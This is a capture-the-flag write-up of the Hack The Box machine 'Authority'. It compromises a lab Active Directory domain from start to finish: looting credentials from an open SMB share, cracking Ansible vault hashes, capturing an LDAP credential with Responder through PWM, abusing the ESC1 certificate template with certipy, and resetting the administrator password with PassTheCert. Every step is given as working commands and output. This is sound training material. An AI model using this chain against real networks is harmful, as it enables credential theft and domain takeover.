Authority

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 10.129.9.12        
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 10:01 +08
Warning: 10.129.9.12 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.9.12
Host is up (0.17s latency).
Not shown: 65501 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
53/tcp    open     domain
80/tcp    open     http
88/tcp    open     kerberos-sec
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
389/tcp   open     ldap
445/tcp   open     microsoft-ds
464/tcp   open     kpasswd5
593/tcp   open     http-rpc-epmap
636/tcp   open     ldapssl
3268/tcp  open     globalcatLDAP
3269/tcp  open     globalcatLDAPssl
5985/tcp  open     wsman
8443/tcp  open     https-alt
9389/tcp  open     adws
47001/tcp open     winrm
49664/tcp open     unknown
49665/tcp open     unknown
49666/tcp open     unknown
49667/tcp open     unknown
49671/tcp open     unknown
49686/tcp open     unknown
49687/tcp open     unknown
49689/tcp open     unknown
49690/tcp open     unknown
49707/tcp open     unknown
49710/tcp open     unknown
60905/tcp open     unknown
64054/tcp open     unknown

This looks like an AD machine. Did a detailed scan to fully enumerate everything.

$ sudo nmap -p 53,80,88,135,139,389,445,8443 -sC -sV --min-rate 3000 10.129.9.12
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 10:03 +08
Nmap scan report for 10.129.9.12
Host is up (0.17s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-17 06:03:32Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2023-07-17T06:04:13+00:00; +4h00m00s from scanner time.
445/tcp  open  microsoft-ds?
8443/tcp open  ssl/https-alt

We can add all the domain names into our /etc/hosts file.

SMB Shares -> Ansible Creds

SMB allowed access to a few shares with no credentials:

$ smbmap -u 'guest' -p '' -H 10.129.9.12
[+] IP: 10.129.9.12:445 Name: 10.129.9.12                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Department Shares                                       NO ACCESS
        Development                                             READ ONLY
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        SYSVOL                                                  NO ACCESS       Logon server share

There were quite a few items within the Development share, such as Ansible files nad stuff like that. Within the /Automation/Ansible/PWM/templates folder, we can find Tomcat creds:

$ cat tomcat-users.xml.j2 
<?xml version='1.0' encoding='cp1252'?>

<tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
 version="1.0">

<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>  
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>

</tomcat-users>

Within the ansible_inventory file of PWM, we can find some credentials for Ansible:

$ cat ansible_inventory 
ansible_user: administrator
ansible_password: Welcome1
ansible_port: 5985
ansible_connection: winrm
ansible_winrm_transport: ntlm
ansible_winrm_server_cert_validation: ignore

This suggests using WinRM, and I do know it is possible to execute commands using Ansible's WinRM module. Within the default directory, there's a main.yml file with some hashes:

$ cat main.yml 
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764

We can try to crack these hashes using using ansible-vault decrypt and john. However, each vault has its own password that we need to crack. I read the source code to find the format required for this, including the newlines:

$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438

Then, we can run john to crack this:

$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes 
Using default input encoding: UTF-8
Loaded 1 password hash (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 128/128 AVX 4x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&*         (tojohn.yml)     
1g 0:00:00:13 DONE (2023-07-17 10:38) 0.07220g/s 2874p/s 2874c/s 2874C/s 001983..victor2
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

This would give us the output:

$ cat tojohn.yml| ansible-vault decrypt 
Vault password: 
Decryption successful
svc_pwm 

We can repeat the process for the rest of the hashes. This would find two more credentials:

pWm_@dm!N_!23 (for login)
DevT3st@123 (for ldap)

Web Enumeration -> Responder

Port 80 just shows an IIS Server. Port 8443 uses TLS and redirects me a login at /pwm/private/login:

We have the credentials for this, so let's try to edit the configurations. WIthin the LDAP config, we can change the LDAP URL:

This looks vulnerable to some hash capturing via responder. I replaced the LDAP URL with ldap://10.10.14.9:389 and then clicked on 'Test LDAP Profile', and responder captured a hash:

With this, we can evil-winrm in to the machine:

Privilege Escalation

ESC1 + Add Computer -> Reset DA Password

Within the machine, there are some certificates available:

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> ls cert:/Localmachine/My


   PSParentPath: Microsoft.PowerShell.Security\Certificate::Localmachine\My

Thumbprint                                Subject
----------                                -------
790DCBD9D91E34EDE37CDAD9C114C3DE1BEBA7BE  CN=authority.authority.htb
42A80DC79DD9CE76D032080B2F8B172BC29B0182  CN=AUTHORITY-CA, DC=authority, DC=htb

This sort of guided me towards exploiting vulnerable certificate templates. I used certipy to find the CA stuff.

$ certipy find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -dc-ip 10.129.9.12
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Saved BloodHound data to '20230717105005_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230717105005_Certipy.txt'
[*] Saved JSON output to '20230717105005_Certipy.json'

Then, I looked through the certificates to see if there were any vulnerabilities. There was one vulnerability that it picked up on:

1
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollmentCheckUserDsCertificate
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
                                          Document Signing
                                          IP security IKE intermediate
                                          IP security use
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 20 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : AUTHORITY.HTB\Administrator
        Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Property Principals       : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

The svc_ldap user can add new computers (most of the time Domain Users can do this), thus allowing us to request for the certificate needed.

First, add the new computer:

$ addcomputer.py -dc-ip 10.129.9.12 -computer-pass 'Password@123' -computer-name Evil 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -computer-group 'CN=Domain Computers, DC=authority,DC=Authority,DC=htb'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Successfully added machine account Evil$ with password Password@123.

Then, use this to request for the template.

$ certipy req -u 'Evil$' -p 'Password@123' -dc-ip 10.129.9.12 -ca AUTHORITY-CA -template CorpVPN -upn Administrator -debug
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.129.9.12[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.129.9.12[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

We are unable to request for a TGT using this certificate however.

$ certipy auth -pfx 'administrator.pfx' -username administrator -domain authority.htb -dc-ip 10.129.9.12 
Certipy v4.4.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

This means that Rubeus would fail as well. In this case, let's try to Pass the Certificate to reset the administrator's password.

GitHub - AlmondOffSec/PassTheCert: Proof-of-Concept tool to authenticate to an LDAP/S server with a certificate through SchannelGitHub

First, generate the key and cert files:

$ certipy cert -pfx administrator.pfx -nocert -out admin.key
$ certipy cert -pfx administrator.pfx -nokey -out admin.crt

Then, reset the administrator password:

$ python3 passthecert.py -action modify_user -crt admin.crt -key admin.key -domain authority.htb -dc-ip 10.129.8.242 -target administrator -new-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Successfully changed administrator password to: R08Fv3VKaSyyI1tJ1FYi1mAEGklJvWFy

Rooted!